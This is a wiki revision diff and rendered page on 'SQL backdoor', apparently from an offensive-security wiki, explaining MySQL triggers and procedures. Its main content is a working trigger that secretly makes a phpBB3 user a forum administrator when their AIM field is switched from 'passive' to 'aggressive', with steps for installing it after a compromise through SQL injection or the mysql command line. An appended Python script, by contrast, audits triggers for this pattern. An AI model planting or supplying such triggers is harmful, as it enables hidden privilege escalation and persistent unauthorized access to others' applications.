Difference between revisions of "SQL backdoor"
(→MySQL) |
(→Event Procedures) |
Line 6: | Line 6: | ||
'''Sub-procedures''' are similar to '''functions''' or '''methods''' in other programming languages. They can be passed arguments, perform operations on the arguments passed, and return computed data. | '''Sub-procedures''' are similar to '''functions''' or '''methods''' in other programming languages. They can be passed arguments, perform operations on the arguments passed, and return computed data. | ||
==Event Procedures== | ==Event Procedures== | ||
− | '''Triggers''', otherwise referred to as '''event procedures''' in other programming languages, may be attached to any table for '''update''','''delete''', or '''insert''' queries. It is important to note that while triggers cannot be bound to '''select''' queries, many applications store user activity history in [[SQL]] (search history, for example). In stead of hooking the '''SELECT ... LIKE''' statement against the table being searched to determine if a search query contained a particular keyword, a developer can hook the '''INSERT''' query against the history table where the search is logged. | + | {{warning|If a table already has a trigger attached for the query type you are attempting to hook, installation of the backdoor will fail.}}'''Triggers''', otherwise referred to as '''event procedures''' in other programming languages, may be attached to any table for '''update''','''delete''', or '''insert''' queries. It is important to note that while triggers cannot be bound to '''select''' queries, many applications store user activity history in [[SQL]] (search history, for example). In stead of hooking the '''SELECT ... LIKE''' statement against the table being searched to determine if a search query contained a particular keyword, a developer can hook the '''INSERT''' query against the history table where the search is logged. |
=Implementation= | =Implementation= |
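Review bot: the new {{warning|...}} template on the + line is fused directly onto the start of the '''Triggers''' paragraph, and it states that installation "will fail" without naming the database engine or version the limit applies to, even though it sits in the general Event Procedures section rather than under MySQL. Put the template on its own line and scope the statement to the engine and version it was observed on. The paragraph carried over from the − line also still reads "In stead" for "Instead" and has no space after the comma in "'''update''','''delete'''".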
Revision as of 21:56, 25 January 2012
SQL Malware affects a variety of database-driven applications, including but not limited to web applications, services, and desktop applications. This breed of malware is made possible by the SQL functionality for triggers and stored sub-procedures.
Concept
Subprocedures
Sub-procedures are similar to functions or methods in other programming languages. They can be passed arguments, perform operations on the arguments passed, and return computed data.
Event Procedures
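If a table already has a trigger attached for the query type you are attempting to hook, installation of the backdoor will fail.
Triggers, otherwise referred to as event procedures in other programming languages, may be attached to any table for update, delete, or insert queries. It is important to note that while triggers cannot be bound to select queries, many applications store user activity history in SQL (search history, for example). Instead of hooking the SELECT ... LIKE statement against the table being searched to determine if a search query contained a particular keyword, a developer can hook the INSERT query against the history table where the search is logged.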
Implementation
These notes are for educational purposes only. Use of these code snippets on systems or databases that you do not own is a criminal act.
MySQL
- CREATE FUNCTION and CREATE PROCEDURE require the CREATE ROUTINE privilege to execute successfully. Depending on the security context of the CREATE statement's DEFINER clause, the SUPER privilege may also be required. (As of MySQL 5.0.3)
- CREATE TRIGGER requires the SUPER privilege on the selected database in order to execute successfully.
- CREATE TRIGGER was added to MySQL in version 5.0.2 and has not been removed since.
Syntax
Because MySQL procedures and triggers are meant to be stored by the SQL server rather than interpreted at runtime, a delimiter command must be used from the command line in order for the `;' character to pass through to the server unscathed.
Create Trigger Syntax:
 delimiter #
 create trigger trigger_name before [ update | insert | delete ] on table_name
 for each row
 begin
     [procedural sql code goes here]
 end; #
 delimiter ;
Example: phpBB3 backdoor
Obtaining forum administrator level permissions on phpBB3 can allow an attacker to obtain remote code execution by enabling PHP in template files and embedding a PHP backdoor.
Code
 delimiter #
 CREATE TRIGGER update_users BEFORE UPDATE ON phpbb3_users
 FOR EACH ROW
 BEGIN
     IF OLD.user_aim="passive" AND NEW.user_aim="aggressive" THEN
         SET NEW.group_id = 5;
         SET NEW.user_type = 3;
     END IF;
 END;#
 delimiter ;
Analysis
In phpBB3, the default user_type and group_id values for an administrative user are 3 and 5, respectively. To ensure we don't trip our backdoor by accident, we require two actions to activate it. A user must first set their AIM (AOL Instant Messenger) name in their forum profile to `passive'. This meets the first criterion. Changing the AIM name directly from `passive' to `aggressive' then activates the backdoor and upgrades the user account to a forum administrator.
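A defender's check for the pattern analysed above, as an added example that is not part of the original page: it scans rows taken from MySQL's information_schema.TRIGGERS for BEFORE triggers that rewrite privilege columns behind a literal-value condition. The schema name, the benign sample row and the PRIVILEGE_COLUMNS set are assumptions constructed for illustration; group_id and user_type are the columns named in the trigger on this page.

```python
import re

# Query an administrator would run to collect the rows audited below.
AUDIT_QUERY = """SELECT TRIGGER_SCHEMA, TRIGGER_NAME, ACTION_TIMING,
       EVENT_MANIPULATION, EVENT_OBJECT_TABLE, DEFINER, ACTION_STATEMENT
FROM information_schema.TRIGGERS"""

# Assumption: columns that carry privilege in the audited application.
PRIVILEGE_COLUMNS = {"group_id", "user_type"}

# "SET NEW.col =" is an assignment; OLD./NEW.col = 'literal' is a comparison gate.
ASSIGN = re.compile(r"\bSET\s+NEW\.`?(\w+)`?\s*=", re.I)
MAGIC = re.compile(r"\b(?:OLD|NEW)\.`?(\w+)`?\s*=\s*(['\"])(.*?)\2", re.I)

def audit_trigger(row):
    """Return a list of findings for one information_schema.TRIGGERS row."""
    body = row["ACTION_STATEMENT"]
    findings = []
    assigned = {c.lower() for c in ASSIGN.findall(body)}
    hits = sorted(assigned & PRIVILEGE_COLUMNS)
    if row["ACTION_TIMING"] == "BEFORE" and hits:
        findings.append("rewrites privilege column(s): " + ", ".join(hits))
    # Columns compared against string literals but never assigned: the "switch".
    gates = sorted({m.group(1).lower() for m in MAGIC.finditer(body)} - assigned)
    if hits and gates:
        findings.append("gated on literal value of: " + ", ".join(gates))
    return findings

def audit(rows):
    """Map 'schema.trigger' to its findings for every trigger that has any."""
    report = {}
    for row in rows:
        found = audit_trigger(row)
        if found:
            report[f'{row["TRIGGER_SCHEMA"]}.{row["TRIGGER_NAME"]}'] = found
    return report

# Constructed sample rows: the trigger shown on this page and a benign one.
SAMPLE_ROWS = [
    {"TRIGGER_SCHEMA": "forum", "TRIGGER_NAME": "update_users",
     "ACTION_TIMING": "BEFORE", "EVENT_OBJECT_TABLE": "phpbb3_users",
     "ACTION_STATEMENT": 'BEGIN IF OLD.user_aim="passive" AND '
                         'NEW.user_aim="aggressive" THEN SET NEW.group_id = 5; '
                         'SET NEW.user_type = 3; END IF; END'},
    {"TRIGGER_SCHEMA": "forum", "TRIGGER_NAME": "touch_row",
     "ACTION_TIMING": "BEFORE", "EVENT_OBJECT_TABLE": "example_log",
     "ACTION_STATEMENT": "BEGIN SET NEW.updated_at = NOW(); END"},
]

if __name__ == "__main__":
    for name, found in audit(SAMPLE_ROWS).items():
        print(name, found)
```

Any trigger this reports that is not in the application's own schema files deserves review, along with the DEFINER account returned by the query.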
Backdoor Installation
Because they lie virtually dormant until their conditions are met and typically ensure escalation to code execution, backdoors of this type are usually installed after a machine has been compromised, in case access is later lost.
Access/Configuration Requirements
One of the following is necessary to install your backdoor:
- MySQL CLI Access
- Ability to write files on the target system
- Multiple queries allowed in the SQL statements from the SQL API in use
Writing to file and using "source"
- Write the code contents to a .sql file (we will use file.sql as an example)
- From an SQL injection vulnerability or from the mysql command line, execute the query:
source /path/to/file.sql
Writing directly into the command line
- Invoke `mysql -uuser -ppassword [database_name]' from the Bash command line.
- If you forgot to specify the database name, simply typing `use [databasename]' will resolve this.
- Paste the code exactly as it is on this page into the MySQL terminal.